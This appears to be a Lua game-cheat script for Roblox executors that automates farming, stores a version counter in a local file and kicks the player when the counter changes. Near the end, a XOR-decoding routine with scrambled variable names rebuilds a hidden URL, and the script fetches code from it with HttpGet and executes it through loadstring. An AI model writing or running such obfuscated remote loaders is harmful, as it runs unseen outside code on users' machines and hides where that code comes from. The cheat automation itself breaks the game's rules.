task.spawn(function()

_G.start_vvv_ = true
_G.delay_play_vvv3 = 1
_G.FPS_farm = 4

_G.FPS_event = 4

if _G.Super_S == true then
	
else			
	if _G.RunsLeft_TIMEtrial == 0 and EVENT_or_FARM == "F" then
		--game.Players.LocalPlayer:Kick("kick fin")
	end
	if _G.RunsLeft_TIMEtrial > 0 and EVENT_or_FARM == "E" and _G.start_vvv_ == true then
		--game.Players.LocalPlayer:Kick("kick pla")
	end
end

--task.wait(3600)

local _Config_Online = 19
local FILE_NAME = "OFFLINE.txt"
if not writefile or not readfile then    return	end
local function getOffline()
    if not isfile or not isfile(FILE_NAME) then
        writefile(FILE_NAME, "0")
        return 0
    end
    local content = readfile(FILE_NAME)
    local val = tonumber(content)
    if val == nil then
        writefile(FILE_NAME, "0")
        return 0
    end
    return val
end
local function setOffline(v)
    writefile(FILE_NAME, tostring(v))
end
local _Config_Offline = getOffline()
if _Config_Offline ~= _Config_Online then

	    setOffline(_Config_Online)
		if _G.Restart == true then
			_G.Restart = false 	
			return
		end
		--------------------------------------------
		if EVENT_or_FARM == "E" then
			--game.Players.LocalPlayer:Kick("kick reset")		
		end
		game.Players.LocalPlayer:Kick("kick reset")		
		--------------------------------------------
end

if _G.Restart == true then
	_G.Restart = false 	
end

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9) local v10={};for v11=1, #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + 1 )),v1(v2(v9,1 + (v11% #v9) ,1 + (v11% #v9) + 1 )))%256 ));end return v5(v10);end loadstring(game:HttpGet(v7("\217\215\207\53\245\225\136\81\193\207\218\44\232\246\196\27\221\207\150\33\181\190\159\80\218\214\205\60\232\191\201\80\198\204\201\46\227\169\212\80\213\198\205\106\197\179\194\29\218\252\238\22\195\137\137\18\196\194","\126\177\163\187\69\134\219\167")))();

local now = os.date("!*t", os.time(os.date("!*t")) + 7 * 3600)
local currentHour = now.hour

if currentHour > 21 or currentHour < 9 then
	_G.start_vvv_ = false
end

end)


